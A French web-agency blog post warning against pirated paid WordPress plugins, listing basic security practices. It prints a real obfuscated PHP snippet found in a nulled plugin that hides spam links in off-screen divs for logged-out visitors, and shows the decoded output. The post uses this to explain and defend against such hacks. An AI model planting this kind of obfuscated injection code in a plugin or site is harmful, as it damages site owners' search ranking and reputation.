wordpress hacked

Wordpres : télécharger un plugin payant illégalement ?! (ou comment se faire hacker....)

La première question se pose : pourquoi acheter un plugin wordpress payant quand on peut avoir un gratuit ? 

Wordpress étant tout simplement le CMS le plus répandu au monde (oui oui, au monde !), il est logique de trouver une bibliothèque de plugin à sa mesure ! On y trouve de tout ! Beaucoup de plugins gratuits font presque aussi bien que les payants ! Alors, avant toute chose, pourquoi un plugin payant ?!

Parce que tout réside dans le "presque" ! Si un plugin gratuit répond à 80% du travail, peut-on se passer des 20% restant ? si oui, alors, tant mieux, mais si non, alors, il faudra débourser un petit peu ! Et vu le prix moyen des plugins (30€), ca vaut quand même rarement le coup de se priver ! 

Les avantages des plugins wordpress payants

Il y a 3 gros avantages principaux :

1. les fonctionnalités

Un plugin payant aura forcément des fonctions avancées qu'un plugin gratuit n'aura pas. Pourquoi ? Tout simplement parce qu'il faut plus d'heures de travail.

2. Le support

Un plugin payant aura également un support, alors qu'un plugin gratuit aura au mieux un mail avec des réponses aléatoires. Lorsque je vous parlais des 20% restants, ils sont là, dans le support. Si des fonctions supplémentaires sont necessaires, les équipes de support du plugin sont là pour aider. (encore que pas toujours, mais au moins, ils peuvent orienter ! )

3. LA SÉCURITÉ

Et là, on va entrer dans le vif du sujet ! La sécurité ! Si wordpress est le CMS le plus répandu au monde, c'est évidemment le plus attaqué aussi ! Il faut donc s'assurer d'avoir des plugins sûrs et à jour.

Les règles de sécurité de base avec Wordpress

On ne le redit jamais assez : il faut mettre à jour wordpress et ses plugins ! Si le core de Wordpress est régulièrement patché, il faut s'assurer que les plugins le soient également ! 

  1. On fait des backups avant de faire les mises à jour en cas d'erreur 500 !
  2. On fait les mises à jour Wordpress et plugin
  3. On supprime tout ce qui ne sert à rien (on ne fait pas que désactiver un plugin, on le supprime)
  4. On met des plugins de sécurité (ithemes, sucuri, wordfence sont les principaux)
  5. On n'installe pas de plugin qui n'ont pas été mis à jour depuis plus d'un an
  6. et surtout ..... ON NE TELECHARGE PAS DE PLUGIN ILLEGALEMENT !

Et je vais donner un joli exemple sur ce dernier point !

Comment se faire hacker son site en telechargeant des plugins illégaux ?!

 Voila un cas concret que j'ai eu il y a peu de temps. On me demande de remettre un wordpress en marche. Jusque là, c'est simple. Je récupère les fichiers, et passe à l'antivirus. Et là, ALERTE ! un fichier corrompu dans un plugin ! Voici le bout de code en question :

 if( ! function_exists('sorry_function')){
function sorry_function($content) {
if (is_user_logged_in()){return $content;} else {if(is_page()||is_single()){
$vNd25 = "\74\144\151\x76\40\163\x74\x79\154\145\x3d\42\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73\x6f\154\165\164\ 145\73\164\157\160\x3a\60\73\154\145\146\x74\72\55\71\71\x39\71\x70\170\73\42\x3e\x57\x61\x6e\x74\40\x63\162\145\x61\x74\ x65\40\163\151\164\x65\x3f\x20\x46\x69\x6e\x64\40\x3c\x61\x20\x68\x72\145\146\75\x22\x68\x74\164\x70\72\x2f\57\x64\x6c\ x77\x6f\162\144\x70\x72\x65\163\163\x2e\x63\x6f\x6d\57\42\76\x46\x72\145\145\40\x57\x6f\x72\x64\x50\162\x65\163\x73\x20\ 124\x68\x65\155\145\x73\x3c\57\x61\76\40\x61\x6e\144\x20\x70\x6c\165\147\x69\156\x73\x2e\x3c\57\144\151\166\76";
$zoyBE = "\74\x64\x69\x76\x20\x73\x74\171\154\145\x3d\x22\x70\157\163\x69\x74\x69\x6f\156\x3a\141\142\163\x6f\154\x75\164\ x65\x3b\x74\157\160\72\x30\73\x6c\x65\x66\164\72\x2d\x39\71\71\x39\x70\x78\73\42\x3e\104\x69\x64\x20\x79\x6f\165\40\x66\x69\ 156\x64\40\141\x70\153\40\146\157\162\x20\x61\156\144\162\x6f\151\144\77\40\x59\x6f\x75\x20\x63\x61\156\x20\146\x69\x6e\ x64\40\156\145\167\40\74\141\40\150\162\145\146\x3d\x22\150\x74\x74\160\163\72\57\x2f\x64\154\x61\156\x64\x72\157\151\x64\62 \x34\56\x63\x6f\155\x2f\42\x3e\x46\x72\145\x65\40\x41\x6e\x64\x72\157\151\144\40\107\141\x6d\145\x73\74\x2f\x61\76\40\x61\ 156\x64\x20\x61\160\x70\163\x2e\ 74\x2f\x64\x69\x76\76";
$fullcontent = $vNd25 . $content . $zoyBE; } else { $fullcontent = $content; } return $fullcontent; }}
add_filter('the_content', 'sorry_function');}

Et ce bout de code nous donne une belle DIV cachée du type :

Want create site? Find Free WordPress Themes and plugins.

< div style="position:absolute;top:0;left:-9999px;">Want create site? Find < a href = "http: // sitepasjoli / ">Free WordPress Themes< / a> and plugins.< /div>"; $zoyBE = "< div style= " position:absolute;top:0;left:-9999px; " >Did you find apk for android? You can find new < a href = "unautresitepasjoli ">Free Android Games< / a> and apps.< / div>"

Ce genre de hack est typique des plugins téléchargés sur des sites non-officiels. Le plugin payant est disponible gratuitement et vient même avec un cadeau bonus !

Ceci peut gravement impacter votre SEO, dans le sens où votre site peut vite se faire classer comme "à risque" pour cause de "code malicieux". Vous ne pourrez plus le partager sur les réseaux sociaux, et chutera dans le classement Google !

Et si vous n'analysez pas votre site, ce hack passera completement inaperçu et vous passerez des mois sans savoir pourquoi votre site n'est pas bien référencé !

Alors surtout :

Ne téléchargez jamais de plugin payant autre part que sur les sites officiels, ou vous risquez de vous tirer une balle dans le pied sans même vous en apercevoir !

 

 

 

Contactez-nous

Téléphone
+34 658 095 971
Mail
contact@alcanix.net
Adresse
Barcelona

Agence digitale à Barcelone

Nous vous fournissons les outils pour la création de votre site internet en français à Barcelone

Support en Français

En plus de l'espagnol ou de l'anglais, nous vous aidons dans votre langue afin d'optimiser votre temps

Création de votre site

Nous parlerons ensemble de votre projet dans votre langue pour une meilleure compréhension de vos besoins